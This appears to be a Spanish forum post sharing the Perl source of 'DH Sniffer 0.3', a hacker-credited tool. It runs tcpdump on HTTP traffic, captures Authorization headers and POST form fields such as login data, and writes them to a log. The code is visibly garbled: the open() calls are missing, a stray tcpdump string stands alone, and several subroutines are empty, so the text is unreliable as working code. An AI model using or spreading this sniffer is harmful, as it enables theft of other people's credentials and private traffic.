El codigo :
Código
#!usr/bin/perl #DH Sniffer 0.3 #(C) Doddy Hackman 2014 #Credits : #Based on : #http://stackoverflow.com/questions/4777042/can-i-use-tcpdump-to-get-http-requests-response-header-and-response-body #http://www.perlmonks.org/?node_id=656590 #http://stein.cshl.org/~lstein/talks/WWW6/sniffer/ #http://perlenespanol.com/foro/post36051.html #Thanks to : Lincoln D. Stein , paulz and Explorer use CGI; use threads; use URI::Escape; $| = 1; head(); if ( $control eq "" ) { copyright(); } my $hilo_get = threads->new( \&sniffer_get ); my $hilo_post = threads->new( \&sniffer_post ); $hilo_get->join; $hilo_post->join; sub sniffer_get { if ( $control =~ /g/ ) { while (<GET>) { if (/^\S/) { while ( $contenido =~ /(GET|POST|WWW-Authenticate|Authorization).+/g ) { savefile( "logs", "\n[+] $ip = $name " . uri_unescape($&) ); } ( $ip, $name ) = /IP (\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/; } s/\s+//g; s/0x[abcdef\d]+://i; s/([0-9a-f]{2})/chr(hex($1))/eg; tr/\x1F-\x7E\r\n//cd; $contenido .= $_; } } } sub sniffer_post { if ( $control =~ /p/ ) { "tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' |" ); while (<POST>) { if (/^\S/) { my $code = $_; $buscando = CGI->new($code); my @params = $buscando->param; foreach $par (@params) { if ( $par =~ /\./ ) { next; } else { my $dataf = $buscando->param($par); savefile( "logs", "\n[+] $par " . " : " . $dataf ); } } } } } } sub savefile { close SAVE; } sub head { } sub copyright { } # The End ?
Eso es todo.